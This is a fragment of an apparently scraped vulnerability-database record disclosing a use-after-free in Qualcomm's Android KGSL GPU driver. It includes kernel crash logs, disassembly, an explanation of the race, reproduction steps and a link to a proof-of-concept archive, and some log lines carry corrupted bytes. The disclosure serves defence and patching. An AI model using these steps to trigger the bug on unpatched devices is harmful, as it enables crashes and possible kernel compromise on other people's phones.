ext4_tmpfile+0xb4/0x230\r\n<4>[ 447.568172] c3 2621 [<ffffffa68a09f9e8>] path_openat+0x934/0x1404\r\n<4>[ 447.573556] c3 2621 [<ffffffa68a0a1a50>] do_filp_open+0x98/0x188\r\n<4>[ 447.579027] c3 2621 [<ffffffa68a089004>] do_sys_open+0x170/0x2d4\r\n<4>[ 447.584407] c3 2621 [<ffffffa68a0891a0>] SyS_openat+0x10/0x18\r\n<4>[ 447.589787] c3 2621 [<ffffffa689e842b0BCho<D5>\r\n^@^@<90>^A,^A^Hp<D6>M>] el0_svc_naked+0x24/0x28\r\n<3>[ 447.594909] c3 2621 \r\n<3>[ 447.599065] c3 2621 Freed by task 36:\r\n<4>[ 447.601330] c3 2621 [<ffffffa689e8d624>] save_stack_trace_tsk+0x0/0x1b8\r\n<4>[ 447.606461] c3 2621 [<ffffffa689e8d7f4>] save_stack_trace+0x18/0x20\r\n<4>[ 447.612450] c3 2621 [<ffffffa68a07aa1c>] kasan_slab_free+0xb0/0x1c0\r\n<4>[ 447.618091] c3 2621 [<ffffffa68a0770c0>] kmem_cache_free+0x80/0x2f8\r\n<4>[ 447.623733] c3 2621 [<ffffffa68a1863f8>] ext4_i_callback+0x18/0x20\r\n<4>[ 447.629363] c3 2621 [<ffffffa689f5c430>] rcu_nocb_kthread+0x20c/0x264\r\n<4>[ 447.634926] c3 2621 [<ffffffa689ee59a4>] kthread+0x114/0x130\r\n<4>[ 447.640726] c3 2621 [<ffffffa689e84250>] ret_from_fork+0x10/0x40\r\n<3>[ 447.645765] c3 2621 \r\n<3>[ 447.649913] c3 2621 The buggy address belongs to the object at 0000000000000000\r\n<3>[ 447.649913] c3 2621 which belongs to the cache ext4_inode_cache of size 1048\r\n<3>[ 447.652315] c3 2621 The buggy address is located 680 bytes inside of\r\n<3>[ 447.652315] c3 2621 1048-byte region [0000000000000000, 0000000000000000)\r\n<3>[ 447.667170] c3 2621 The buggy address belongs to the page:\r\n<1>[ 447.680933] c3 2621 Unable to handle kernel paging request at virtual address ffffffd8929b3000\r\n<1>[ 447.686392] c3 2621 pgd = 0000000000000000\r\n<1>[ 447.695099] c3 2621 [ffffffd8929b3000] *pgd=0000000000000000, *pud=0000000000000000\r\n<4>[ 447.706506] c3 2621 ------------[ cut here ]------------\r\n<2>[ 447.706664] c3 2621 Kernel BUG at 0000000000000000 [verbose debug info unavailable]\r\n<0>[ 447.711676] c3 2621 Internal error: Oops - BUG: 96000047 [#1] 
PREEMPT SMP\r\n<4>[ 447.719517] c3 2621 Modules linked in:\r\n<4>[ 447.729365] c3 2621 CPU: 3 PID: 2621 Comm: kworker/3:3 Not tainted 4.4.116-gbcd0ecccd040-dirty #45\r\n<4>[ 447.729573] c3 2621 Hardware name: Qualcomm Technologies, Inc. MSM8998 v2.1 (DT)\r\n<4>[ 447.738760] c3 2621 Workqueue: kgsl-mementry _deferred_put\r\n<4>[ 447.750779] c3 2621 task: 0000000000000000 task.stack: 0000000000000000\r\n<4>[ 447.750972] c3 2621 PC is at el1_sync+0x28/0xe0\r\n<4>[ 447.757719] c3 2621 LR is at dump_page+0x10/0x18\r\n<4>[ 447.762390] c3 2621 pc : [<ffffffa689e836e8>] lr : [<ffffffa68a04d9dc>] pstate: 204003c5\r\n<4>[ 447.767106] c3 2621 sp : ffffffd8929b2f60\r\n<4>[ 447.775306] c3 2621 x29: ffffffd8929b4000 x28: ffffffd88e9a47d0 \r\n<4>[ 447.784631] c3 2621 x27: ffffffd8294fab80 x26: ffffffa68ba1f000 \r\n<4>[ 447.789927] c3 2621 x25: ffffffd8536fc908 x24: ffffffd8536fc4e8 \r\n<4>[ 447.795219] c3 2621 x23: ffffffd892e55500 x22: 0000000000000001 \r\n<4>[ 447.800513] c3 2621 x21: ffffffa68ba1aa00 x20: 0000000000000000 \r\n<4>[ 447.805809] c3 2621 x19: ffffffbe214dbe00 x18: 0000007f7dc4ef8a \r\n<4>[ 447.811105] c3 2621 x17: 0000007f809eb0e0 x16: ffffffa68a0a5178 \r\n<4>[ 447.816400] c3 2621 x15: 0000000000000021 x14: 202c303030303030 \r\n<4>[ 447.821694] c3 2621 x13: 3030303030303030 x12: e95cc056ac940c73 \r\n<4>[ 447.826992] c3 2621 x11: ffffffd8929fb810 x10: ffffff8b12978008 \r\n<4>[ 447.832286] c3 2621 x9 : ffffff8b12978007 x8 : ffffffa68a21a558 \r\n<4>[ 447.837590] c3 2621 x7 : ffffffa68c69ec28 x6 : 0000000000000040 \r\n<4>[ 447.842872] c3 2621 x5 : 0000000000000000 x4 : ffffff87c429b7c0 \r\n<4>[ 447.848170] c3 2621 x3 : ffffffa68a04d8dc x2 : 0000000000000000 \r\n<4>[ 447.853468] c3 2621 x1 : ffffffa68ba1aa00 x0 : ffffffbe214dbe00 \r\n<4>[ 447.858765] c3 2621 \r\n<4>[ 447.858765] c3 2621 PC: 0xffffffa689e836a8:\r\n<4>[ 447.859009] c3 2621 36a8 d503201f d503201f d503201f d503201f d503201f d503201f a90007e0 a9010fe2\r\n<4>[ 447.873684] c3 2621 36c8 a90217e4 a9031fe6 
a90427e8 a9052fea a90637ec a9073fee a90847f0 a9094ff2\r\n<4>[ 447.881847] c3 2621 36e8 a90a57f4 a90b5ff6 a90c67f8 a90d6ffa a90e77fc 9104c3f5 d538411c f9400794\r\n<4>[ 447.890005] c3 2621 3708 f90093f4 d2c01014 f9000794 d5384036 d5384017 a90f57fe d503201f d5382015\r\n<4>[ 447.898172] c3 2621 \r\n<4>[ 447.898172] c3 2621 LR: 0xffffffa68a04d99c:\r\n<4>[ 447.898371] c3 2621 d99c b000ce80 9113e000 97feface aa1303e0 9400affc f9400260 9117e2e1 528002a2\r\n<4>[ 447.91300BCho<D6>\r\n^@^@<90>^A+^A<98>3<8E><DA>8] c3 2621 d9bc 9106c021 8a000280 97ffff2c 17ffffe6 a9bf7bfd d2800002 910003fd 97ffffb4\r\n<4>[ 447.921170] c3 2621 d9dc a8c17bfd d65f03c0 a9ac7bfd 910003fd a90153f3 a9025bf5 a90363f7 a9046bf9\r\n<4>[ 447.929328] c3 2621 d9fc a90573fb d10443ff aa0003f3 9400afe5 aa1303e0 f8410402 f90033a2 9400af97\r\n<4>[ 447.937494] c3 2621 \r\n<4>[ 447.937494] c3 2621 SP: 0xffffffd8929b2f20:\r\n<4>[ 447.937693] c3 2621 2f20 8a04d9dc ffffffa6 929b2f60 ffffffd8 89e836e8 ffffffa6 204003c5 00000000\r\n<4>[ 447.952331] c3 2621 2f40 00000000 00000000 00000000 00000000 ffffffff ffffffff 00000000 00000000\r\n<4>[ 447.960491] c3 2621 2f60 214dbe00 ffffffbe 8ba1aa00 ffffffa6 00000000 00000000 8a04d8dc ffffffa6\r\n<4>[ 447.968651] c3 2621 2f80 c429b7c0 ffffff87 00000000 00000000 00000040 00000000 8c69ec28 ffffffa6\r\n<4>[ 447.976809] c3 2621 \r\n<0>[ 447.976941] c3 2621 Process kworker/3:3 (pid: 2621, stack limit = 0x0000000000000000)\r\n<4>[ 447.979247] c3 2621 Call trace:\r\n<4>[ 447.987122] c3 2621 Exception stack(0xffffffd8929b2d60 to 0xffffffd8929b2e90)\r\n<4>[ 447.990662] c3 2621 2d60: ffffffbe214dbe00 0000008000000000 00000000836e2000 ffffffa689e836e8\r\n<4>[ 447.997788] c3 2621 2d80: 00000000204003c5 0000000000000025 ffffffd8536fc908 0000000000000000\r\n<4>[ 448.006468] c3 2621 2da0: 0000000000000000 0000000000000000 0000000000000000 0000000000000000\r\n<4>[ 448.015098] c3 2621 2dc0: 0000000000000000 0000000000000000 0000000000000000 0000000000000000\r\n<4>[ 448.023777] c3 2621 2de0: 
0000000000000000 0000000000000000 0000000000000000 0000000000000000\r\n<4>[ 448.032461] c3 2621 2e00: 0000000000000000 0000000000000000 0000000000000000 0000000000000000\r\n<4>[ 448.041195] c3 2621 2e20: 0000000000000000 e95cc056ac940c73 ffffffbe214dbe00 ffffffa68ba1aa00\r\n<4>[ 448.049872] c3 2621 2e40: 0000000000000000 ffffffa68a04d8dc ffffff87c429b7c0 0000000000000000\r\n<4>[ 448.058561] c3 2621 2e60: 0000000000000040 ffffffa68c69ec28 ffffffa68a21a558 ffffff8b12978007\r\n<4>[ 448.067216] c3 2621 2e80: ffffff8b12978008 ffffffd8929fb810\r\n<4>[ 448.075867] c3 2621 [<ffffffa689e836e8>] el1_sync+0x28/0xe0\r\n<0>[ 448.081787] c3 2621 Code: a90637ec a9073fee a90847f0 a9094ff2 (a90a57f4) \r\n<4>[ 448.087496] c3 2621 ---[ end trace 8d4b2347f8b71fe7 ]---\r\n<4>[ 448.087540] c4 2684 ------------[ cut here ]------------\r\n<2>[ 448.087544] c4 2684 Kernel BUG at 0000000000000000 [verbose debug info unavailable]\r\n<0>[ 448.087547] c4 2684 Internal error: Oops - BUG: 96000005 [#2] PREEMPT SMP\r\n<4>[ 448.087553] c4 2684 Modules linked in:\r\n<4>[ 448.087561] c4 2684 CPU: 4 PID: 2684 Comm: poc Tainted: G D 4.4.116-gbcd0ecccd040-dirty #45\r\n<4>[ 448.087563] c4 2684 Hardware name: Qualcomm Technologies, Inc. 
MSM8998 v2.1 (DT)\r\n<4>[ 448.087565] c4 2684 task: 0000000000000000 task.stack: 0000000000000000\r\n<4>[ 448.087578] c4 2684 PC is at qlist_free_all+0x3c/0x80\r\n<4>[ 448.087581] c4 2684 LR is at qlist_free_all+0x7c/0x80\r\n<4>[ 448.087585] c4 2684 pc : [<ffffffa68a07bbbc>] lr : [<ffffffa68a07bbfc>] pstate: 60400145\r\n<4>[ 448.087586] c4 2684 sp : ffffffd87e3b3880\r\n<4>[ 448.087591] c4 2684 x29: ffffffd87e3b3880 x28: ffffffa68ca1a000 \r\n<4>[ 448.087595] c4 2684 x27: 000000000591e848 x26: ffffffd87e3b3920 \r\n<4>[ 448.087598] c4 2684 x25: 0000000000000140 x24: 0000000000000000 \r\n<4>[ 448.087601] c4 2684 x23: ffffffd87e3b3920 x22: ffffffa68a07bbbc \r\n<4>[ 448.087604] c4 2684 x21: 0000000000000000 x20: ffffffd8929f8040 \r\n<4>[ 448.087607] c4 2684 x19: ffffffd8929f8040 x18: 00000000c8056d20 \r\n<4>[ 448.087611] c4 2684 x17: 000000002c754130 x16: 0000000085837409 \r\n<4>[ 448.087613] c4 2684 x15: 00000000a50d5ad3 x14: 0000000000000000 \r\n<4>[ 448.087617] c4 2684 x13: 0000000001075000 x12: ffffffffffffffff \r\n<4>[ 448.087620] c4 2684 x11: 0000000000000040 x10: ffffff8b0fc76746 \r\n<4>[ 448.087623] c4 2684 x9 : ffffff8b0fc76745 x8 : ffffffd87e3b3a2b \r\n<4>[ 448.087626] c4 2684 x7 : 0000000000000000 x6 : ffffffd87e3b3a08 \r\n<4>[ 448.087629] c4 2684 x5 : fffffffffe8c0000 x4 : 0000000000000000 \r\n<4>[ 448.087632] c4 2684 x3 : ffffffd8929f7ff0 x2 : 0000000000000000 \r\n<4>[ 448.087635] c4 2684 x1 : dead0000000000ff x0 : 0000000000000000 \r\n<4>[ 448.087637] c4 2684 \r\n<4>[ 448.087637] c4 2684 PC: 0xffffffa68a07bb7c:\r\n<4>[ 448.087646] c4 2684 bb7c 17fffff1 a9bc7bfd 910003fd a90153f3 a9025bf5 f9001bf7 f9400013 b4000253\r\n<4>[ 448.087655] c4 2684 bb9c 90000016 aa0103f5 aa0003f7 912ef2d6 14000002 aa1403f3 aa1503e0 b40001f5\r\n<4>[ 448.087664] c4 2684 bbbc b980c401 aa1603e2 f9400274 cb010261 97fff36f b5ffff14 f90006ff f90002ff\r\n<4>[ 448.087673] c4 2684 bbdc f9000aff a94153f3 a9425bf5 f9401bf7 a8c47bfd d65f03c0 aa1303e0 
97ffff93\r\n<4>[ 448.087675] c4 2684 \r\n<4>[ 448.087675] c4 2684 LR: 0xffffffa68a07bbbc:\r\n<4>[ 448.087684] c4 2684 bbbc b980c401 aa1603e2 f9400274 cb010261 97fff36f b5ffff14 f90006ff f90002ff\r\n<4>[ 448.087692] c4 2684 bbdc f9000aff a94153f3 a9425bf5 f9401bf7 a8c47bfd d65f03c0 aa1303e0 97ffff93\r\n<4>[ 448.087701] c4 2684 bbfc 17fffff0 a9bc7bfd aa0003e2 910003fd a90153f3 f0012ed3 aa0003f4 b000eb40\r\n<4>[ 448.087711] c4 2684 bc1c 910083a1 d538d083 913c8000 f90013bf 8b000060 f9452a63 f9001fa3 f90017bf\r\n<4>[ 448.087712] c4 2684 \r\n<4>[ 448.087712] c4 2684 SP: 0xffffffd87e3b3840:\r\n<4>[ 448.087722] c4 2684 3840 8a07bbfc ffffffa6 7e3b3880 ffffffd8 8a07bbbc ffffffa6 60400145 00000000\r\n<4>[ 448.087731] c4 2684 3860 7e3b3920 ffffffd8 00000000 00000000 00000000 00000080 8b4ddfd0 ffffffa6\r\n<4>[ 448.087740] c4 2684 3880 7e3b38c0 ffffffd8 8a07bf9c ffffffa6 8c656000 ffffffa6 8ca1f500 ffffffa6\r\n<4>[ 448.087749] c4 2684 38a0 8ca1a000 ffffffa6 000000f7 00000000 8c68d000 ffffffa6 fabb3a00 ffffffd7\r\n<4>[ 448.087750] c4 2684 \r\n<0>[ 448.087753] c4 2684 Process poc (pid: 2684, stack limit = 0x0000000000000000)\r\n<4>[ 448.087754] c4 2684 Call trace:\r\n<4>[ 448.087758] c4 2684 Exception stack(0xffffffd87e3b3680 to 0xffffffd87e3b37b0)\r\n<4>[ 448.087763] c4 2684 3680: ffffffd8929f8040 0000008000000000 00000000836e2000 ffffffa68a07bbbc\r\n<4>[ 448.087768] c4 2684 36a0: 0000000060400145 0000000000000025 0000000000000140 ffffffd7fabb3a00\r\n<4>[ 448.087773] c4 2684 36c0: 0000000000000000 ffffffd87e3b37d0 ffffffd87e3b3720 ffffffa68a0768e0\r\n<4>[ 448.087779] c4 2684 36e0: ffffffbe224a7d80 0000000000000000 ffffffd7fabb3a00 ffffffd7fabb3a00\r\n<4>[ 448.087784] c4 2684 3700: 0000000100150015 ffffffd8929f7e00 0000000180150014 ffffffd899803b00\r\n<4>[ 448.087789] c4 2684 3720: ffffffd87e3b3830 ffffffa68a078b38 ffffffbe224a7d80 ffffffd8929f7ff0\r\n<4>[ 448.087794] c4 2684 3740: ffffffd7fabb3a00 e95cc056ac940c73 0000000000000000 dead0000000000ff\r\n<4>[ 448.087799] c4 2684 3760: 
0000000000000000 ffffffd8929f7ff0 0000000000000000 fffffffffe8c0000\r\n<4>[ 448.087804] c4 2684 3780: ffffffd87e3b3a08 0000000000000000 ffffffd87e3b3a2b ffffff8b0fc76745\r\n<4>[ 448.087808] c4 2684 37a0: ffffff8b0fc76746 0000000000000040\r\n<4>[ 448.087813] c4 2684 [<ffffffa68a07bbbc>] qlist_free_all+0x3c/0x80\r\n<4>[ 448.087819] c4 2684 [<ffffffa68a07bf9c>] quarantine_reduce+0x17c/0x1a0\r\n<4>[ 448.087824] c4 2684 [<ffffffa68a07a1b4>] kasan_kmalloc+0xe0/0xe4\r\n<4>[ 448.087828] c4 2684 [<ffffffa68a07a964>] kasan_slab_alloc+0x14/0x1c\r\n<4>[ 448.087832] c4 2684 [<ffffffa68a078030>] kmem_cache_alloc+0x144/0x27c\r\n<4>[ 448.087840] c4 2684 [<ffffffa68a15d0dc>] ext4_inode_attach_jinode+0x9c/0x118\r\n<4>[ 448.087844] c4 2684 [<ffffffa68a150d74>] ext4_file_open+0xc8/0x21c\r\n<4>[ 448.087848] c4 2684 [<ffffffa68a087488>] do_dentry_open+0x350/0x4ec\r\n<4>[ 448.087851] c4 2684 [<ffffffa68a087930>] finish_open+0x74/0xa8\r\n<4>[ 448.087857] c4 2684 [<ffffffa68a09fa34>] path_openat+0x980/0x1404\r\n<4>[ 448.087861] c4 2684 [<ffffffa68a0a1a50>] do_filp_open+0x98/0x188\r\n<4>[ 448.087866] c4 2684 [<ffffffa68a089004>] do_sys_open+0x170/0x2d4\r\n<4>[ 448.087869] c4 2684 [<ffffffa68a0891a0>] SyS_openat+0x10/0x18\r\n<4>[ 448.087875] c4 2684 [<ffffffa689e842b0>] el0_svc_naked+0x24/0x28\r\n<0>[ 448.087881] c4 2684 Code: 14000002 aa1403f3 aa1503e0 b40001f5 (b980c401) \r\n<4>[ 448.087944] c4 2684 ---[ end trace 8d4DBGC\r\n==================================\r\n\r\nThe KASAN report points to instruction 267c in the following assembly:\r\n\r\n==================================\r\n0000000000002630 <set_page_dirty>:\r\n{\r\n 2630: a9bd7bfd stp x29, x30, [sp, #-48]!\r\n 2634: 910003fd mov x29, sp\r\n 2638: a90153f3 stp x19, x20, [sp, #16]\r\n 263c: f90013f5 str x21, [sp, #32]\r\n 2640: aa0003f3 mov x19, x0\r\n struct address_space *mapping = page_mapping(page);\r\n 2644: 94000000 bl 0 <page_mapping>\r\n 2648: aa0003f4 mov x20, x0\r\n 264c: d5384115 mrs x21, sp_el0\r\n if 
(current->jh_task_flags && mapping)\r\n 2650: 9128a2a0 add x0, x21, #0xa28\r\n 2654: 94000000 bl 0 <__asan_load4>\r\n 2658: b94a2aa0 ldr w0, [x21, #2600]\r\n 265c: 340000a0 cbz w0, 2670 <set_page_dirty+0x40>\r\n 2660: b40003b4 cbz x20, 26d4 <set_page_dirty+0xa4>\r\n msleep(500);\r\n 2664: 52803e80 mov w0, #0x1f4 // #500\r\n 2668: 94000000 bl 0 <msleep>\r\n 266c: 14000002 b 2674 <set_page_dirty+0x44>\r\n if (likely(mapping)) {\r\n 2670: b4000334 cbz x20, 26d4 <set_page_dirty+0xa4>\r\n int (*spd)(struct page *) = mapping->a_ops->set_page_dirty;\r\n 2674: 9101a280 add x0, x20, #0x68\r\n 2678: 94000000 bl 0 <__asan_load8>\r\n 267c: f9403694 ldr x20, [x20, #104]\r\n 2680: 91006280 add x0, x20, #0x18\r\n 2684: 94000000 bl 0 <__asan_load8>\r\n 2688: f9400e94 ldr x20, [x20, #24]\r\n 268c: aa1303e0 mov x0, x19\r\n 2690: 94000000 bl 0 <__asan_load8>\r\n 2694: f9400260 ldr x0, [x19]\r\n==================================\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46941.zip", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/46941"}], "zdt": [{"lastseen": "2019-05-30T07:54:51", "bulletinFamily": "exploit", "description": "Exploit for Android platform in category dos / poc", "modified": "2019-05-29T00:00:00", "published": "2019-05-29T00:00:00", "id": "1337DAY-ID-32820", "href": "https://0day.today/exploit/description/32820", "title": "Qualcomm Android - Kernel Use-After-Free via Incorrect set_page_dirty() in KGSL Exploit", "type": "zdt", "sourceData": "The following issue exists in the android-msm-wahoo-4.4-pie branch of\r\nhttps://android.googlesource.com/kernel/msm (and possibly others):\r\n\r\nWhen kgsl_mem_entry_destroy() in drivers/gpu/msm/kgsl.c is called for a writable\r\nentry with memtype KGSL_MEM_ENTRY_USER, it attempts to mark the entry's pages\r\nas dirty using the function set_page_dirty(). 
This function first loads\r\npage->mapping using page_mapping(), then calls the function pointer\r\nmapping->a_ops->set_page_dirty.\r\n\r\nThe bug is that, as explained in upstream commit e92bb4dd9673\r\n( https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e92bb4dd9673945179b1fc738c9817dd91bfb629),\r\nthe mapping of a page can be freed concurrently unless it is protected somehow\r\n(e.g. by holding the page lock, or by holding a reference to the mapping).\r\nFor callers who don't hold any such lock or reference, set_page_dirty_lock() is\r\nprovided to safely mark a page as dirty:\r\n\r\n==================================\r\n/*\r\n * set_page_dirty() is racy if the caller has no reference against\r\n * page->mapping->host, and if the page is unlocked. This is because another\r\n * CPU could truncate the page off the mapping and then free the mapping.\r\n *\r\n * Usually, the page _is_ locked, or the caller is a user-space process which\r\n * holds a reference on the inode by having an open file.\r\n *\r\n * In other cases, the page should be locked before running set_page_dirty().\r\n */\r\nint set_page_dirty_lock(struct page *page)\r\n{\r\n int ret;\r\n\r\n lock_page(page);\r\n ret = set_page_dirty(page);\r\n unlock_page(page);\r\n return ret;\r\n}\r\n==================================\r\n\r\n\r\nTo reproduce on a Pixel 2 (walleye):\r\n\r\n - Check out the tree specified above.\r\n - Enable KASAN in the kernel config.\r\n - Apply the attached kernel patch kgsl-bigger-race-window.patch to make the\r\n race window much bigger.\r\n - Build and boot the kernel.\r\n - Build the attached poc.c with\r\n `aarch64-linux-gnu-gcc -static -o poc poc.c -Wall`.\r\n - Run the PoC on the device (adb push, then run from adb shell).\r\n\r\nYou should see a kernel crash like this; note KASAN's report of a UAF in\r\nset_page_dirty():\r\n\r\n==================================\r\n<6>[ 445.698708] c3 688 mdss_fb_blank_sub: mdss_fb_blank+0x1d0/0x2b4 
mode:0\r\n<3>[ 447.372706] c3 2621 ==================================================================\r\n<3>[ 447.372963] c3 2621 BUG: KASAN: use-after-free in set_page_dirty+0x4c/0xd0\r\n<3>[ 447.380051] c3 2621 Read of size 8 at addr 0000000000000000 by task kworker/3:3/2621\r\n<3>[ 447.387059] c3 2621 \r\n<4>[ 447.394762] c3 2621 CPU: 3 PID: 2621 Comm: kworker/3:3 Not tainted 4.4.116-gbcd0ecccd040-dirty #45\r\n<4>[ 447.397158] c3 2621 Hardware name: Qualcomm Technologies, Inc. MSM8998 v2.1 (DT)\r\n<4>[ 447.406473] c3 2621 Workqueue: kgsl-mementry _deferred_put\r\n<4>[ 447.418479] c3 2621 Call trace:\r\n<4>[ 447.418660] c3 2621 [<ffffffa689e8dfbc>] dump_backtrace+0x0/0x2b4\r\n<4>[ 447.421952] c3 2621 [<ffffffa689e8e394>] show_stack+0x14/0x1c\r\n<4>[ 447.428066] c3 2621 [<ffffffa68a2f3d2c>] dump_stack+0xa4/0xcc\r\n<4>[ 447.433965] c3 2621 [<ffffffa68a07b254>] print_address_description+0x94/0x340\r\n<4>[ 447.439870] c3 2621 [<ffffffa68a07b784>] kasan_report+0x1f8/0x340\r\n<4>[ 447.447145] c3 2621 [<ffffffa68a079a10>] __asan_load8+0x74/0x90\r\n<4>[ 447.453407] c3 2621 [<ffffffa68a0205b4>] set_page_dirty+0x4c/0xd0\r\n<4>[ 447.459621] c3 2621 [<ffffffa68a6c5dec>] kgsl_mem_entry_destroy+0x1c0/0x218\r\n<4>[ 447.465695] c3 2621 [<ffffffa68a6c63d8>] _deferred_put+0x34/0x3c\r\n<4>[ 447.473017] c3 2621 [<ffffffa689edc124>] process_one_work+0x254/0x78c\r\n<4>[ 447.479093] c3 2621 [<ffffffa689edc6f4>] worker_thread+0x98/0x718\r\n<4>[ 447.485551] c3 2621 [<ffffffa689ee59a4>] kthread+0x114/0x130\r\n<4>[ 447.491801] c3 2621 [<ffffffa689e84250>] ret_from_fork+0x10/0x40\r\n<3>[ 447.497696] c3 2621 \r\n<3>[ 447.503818] c3 2621 Allocated by task 2684:\r\n<4>[ 447.506206] c3 2621 [<ffffffa689e8d624>] save_stack_trace_tsk+0x0/0x1b8\r\n<4>[ 447.511847] c3 2621 [<ffffffa689e8d7f4>] save_stack_trace+0x18/0x20\r\n<4>[ 447.517829] c3 2621 [<ffffffa68a079e74>] kasan_kmalloc.part.5+0x50/0x124\r\n<4>[ 447.523494] c3 2621 [<ffffffa68a07a198>] kasan_kmalloc+0xc4/0xe4\r\n<4>[ 447.529547] c3 2621 
[<ffffffa68a07a964>] kasan_slab_alloc+0x14/0x1c\r\n<4>[ 447.534931] c3 2621 [<ffffffa68a078030>] kmem_cache_alloc+0x144/0x27c\r\n<4>[ 447.540572] c3 2621 [<ffffffa68a187bdc>] ext4_alloc_inode+0x28/0x234\r\n<4>[ 447.546387] c3 2621 [<ffffffa68a0afe94>] alloc_inode+0x34/0xd0\r\n<4>[ 447.552112] c3 2621 [<ffffffa68a0b19e8>] new_inode+0x20/0xe8\r\n<4>[ 447.557318] c3 2621 [<ffffffa68a154214>] __ext4_new_inode+0xe8/0x1f00\r\n<4>[ 447.562360] c3 2621 [<ffffffa68a17087c>] ext4_tmpfile+0xb4/0x230\r\n<4>[ 447.568172] c3 2621 [<ffffffa68a09f9e8>] path_openat+0x934/0x1404\r\n<4>[ 447.573556] c3 2621 [<ffffffa68a0a1a50>] do_filp_open+0x98/0x188\r\n<4>[ 447.579027] c3 2621 [<ffffffa68a089004>] do_sys_open+0x170/0x2d4\r\n<4>[ 447.584407] c3 2621 [<ffffffa68a0891a0>] SyS_openat+0x10/0x18\r\n<4>[ 447.589787] c3 2621 [<ffffffa689e842b0>] el0_svc_naked+0x24/0x28\r\n<3>[ 447.594909] c3 2621 \r\n<3>[ 447.599065] c3 2621 Freed by task 36:\r\n<4>[ 447.601330] c3 2621 [<ffffffa689e8d624>] save_stack_trace_tsk+0x0/0x1b8\r\n<4>[ 447.606461] c3 2621 [<ffffffa689e8d7f4>] save_stack_trace+0x18/0x20\r\n<4>[ 447.612450] c3 2621 [<ffffffa68a07aa1c>] kasan_slab_free+0xb0/0x1c0\r\n<4>[ 447.618091] c3 2621 [<ffffffa68a0770c0>] kmem_cache_free+0x80/0x2f8\r\n<4>[ 447.623733] c3 2621 [<ffffffa68a1863f8>] ext4_i_callback+0x18/0x20\r\n<4>[ 447.629363] c3 2621 [<ffffffa689f5c430>] rcu_nocb_kthread+0x20c/0x264\r\n<4>[ 447.634926] c3 2621 [<ffffffa689ee59a4>] kthread+0x114/0x130\r\n<4>[ 447.640726] c3 2621 [<ffffffa689e84250>] ret_from_fork+0x10/0x40\r\n<3>[ 447.645765] c3 2621 \r\n<3>[ 447.649913] c3 2621 The buggy address belongs to the object at 0000000000000000\r\n<3>[ 447.649913] c3 2621 which belongs to the cache ext4_inode_cache of size 1048\r\n<3>[ 447.652315] c3 2621 The buggy address is located 680 bytes inside of\r\n<3>[ 447.652315] c3 2621 1048-byte region [0000000000000000, 0000000000000000)\r\n<3>[ 447.667170] c3 2621 The buggy address belongs to the 
page:\r\n<1>[ 447.680933] c3 2621 Unable to handle kernel paging request at virtual address ffffffd8929b3000\r\n<1>[ 447.686392] c3 2621 pgd = 0000000000000000\r\n<1>[ 447.695099] c3 2621 [ffffffd8929b3000] *pgd=0000000000000000, *pud=0000000000000000\r\n<4>[ 447.706506] c3 2621 ------------[ cut here ]------------\r\n<2>[ 447.706664] c3 2621 Kernel BUG at 0000000000000000 [verbose debug info unavailable]\r\n<0>[ 447.711676] c3 2621 Internal error: Oops - BUG: 96000047 [#1] PREEMPT SMP\r\n<4>[ 447.719517] c3 2621 Modules linked in:\r\n<4>[ 447.729365] c3 2621 CPU: 3 PID: 2621 Comm: kworker/3:3 Not tainted 4.4.116-gbcd0ecccd040-dirty #45\r\n<4>[ 447.729573] c3 2621 Hardware name: Qualcomm Technologies, Inc. MSM8998 v2.1 (DT)\r\n<4>[ 447.738760] c3 2621 Workqueue: kgsl-mementry _deferred_put\r\n<4>[ 447.750779] c3 2621 task: 0000000000000000 task.stack: 0000000000000000\r\n<4>[ 447.750972] c3 2621 PC is at el1_sync+0x28/0xe0\r\n<4>[ 447.757719] c3 2621 LR is at dump_page+0x10/0x18\r\n<4>[ 447.762390] c3 2621 pc : [<ffffffa689e836e8>] lr : [<ffffffa68a04d9dc>] pstate: 204003c5\r\n<4>[ 447.767106] c3 2621 sp : ffffffd8929b2f60\r\n<4>[ 447.775306] c3 2621 x29: ffffffd8929b4000 x28: ffffffd88e9a47d0 \r\n<4>[ 447.784631] c3 2621 x27: ffffffd8294fab80 x26: ffffffa68ba1f000 \r\n<4>[ 447.789927] c3 2621 x25: ffffffd8536fc908 x24: ffffffd8536fc4e8 \r\n<4>[ 447.795219] c3 2621 x23: ffffffd892e55500 x22: 0000000000000001 \r\n<4>[ 447.800513] c3 2621 x21: ffffffa68ba1aa00 x20: 0000000000000000 \r\n<4>[ 447.805809] c3 2621 x19: ffffffbe214dbe00 x18: 0000007f7dc4ef8a \r\n<4>[ 447.811105] c3 2621 x17: 0000007f809eb0e0 x16: ffffffa68a0a5178 \r\n<4>[ 447.816400] c3 2621 x15: 0000000000000021 x14: 202c303030303030 \r\n<4>[ 447.821694] c3 2621 x13: 3030303030303030 x12: e95cc056ac940c73 \r\n<4>[ 447.826992] c3 2621 x11: ffffffd8929fb810 x10: ffffff8b12978008 \r\n<4>[ 447.832286] c3 2621 x9 : ffffff8b12978007 x8 : ffffffa68a21a558 \r\n<4>[ 447.837590] c3 2621 x7 : ffffffa68c69ec28 x6 : 
0000000000000040 \r\n<4>[ 447.842872] c3 2621 x5 : 0000000000000000 x4 : ffffff87c429b7c0 \r\n<4>[ 447.848170] c3 2621 x3 : ffffffa68a04d8dc x2 : 0000000000000000 \r\n<4>[ 447.853468] c3 2621 x1 : ffffffa68ba1aa00 x0 : ffffffbe214dbe00 \r\n<4>[ 447.858765] c3 2621 \r\n<4>[ 447.858765] c3 2621 PC: 0xffffffa689e836a8:\r\n<4>[ 447.859009] c3 2621 36a8 d503201f d503201f d503201f d503201f d503201f d503201f a90007e0 a9010fe2\r\n<4>[ 447.873684] c3 2621 36c8 a90217e4 a9031fe6 a90427e8 a9052fea a90637ec a9073fee a90847f0 a9094ff2\r\n<4>[ 447.881847] c3 2621 36e8 a90a57f4 a90b5ff6 a90c67f8 a90d6ffa a90e77fc 9104c3f5 d538411c f9400794\r\n<4>[ 447.890005] c3 2621 3708 f90093f4 d2c01014 f9000794 d5384036 d5384017 a90f57fe d503201f d5382015\r\n<4>[ 447.898172] c3 2621 \r\n<4>[ 447.898172] c3 2621 LR: 0xffffffa68a04d99c:\r\n<4>[ 447.898371] c3 2621 d99c b000ce80 9113e000 97feface aa1303e0 9400affc f9400260 9117e2e1 528002a2\r\n<4>[ 447.913008] c3 2621 d9bc 9106c021 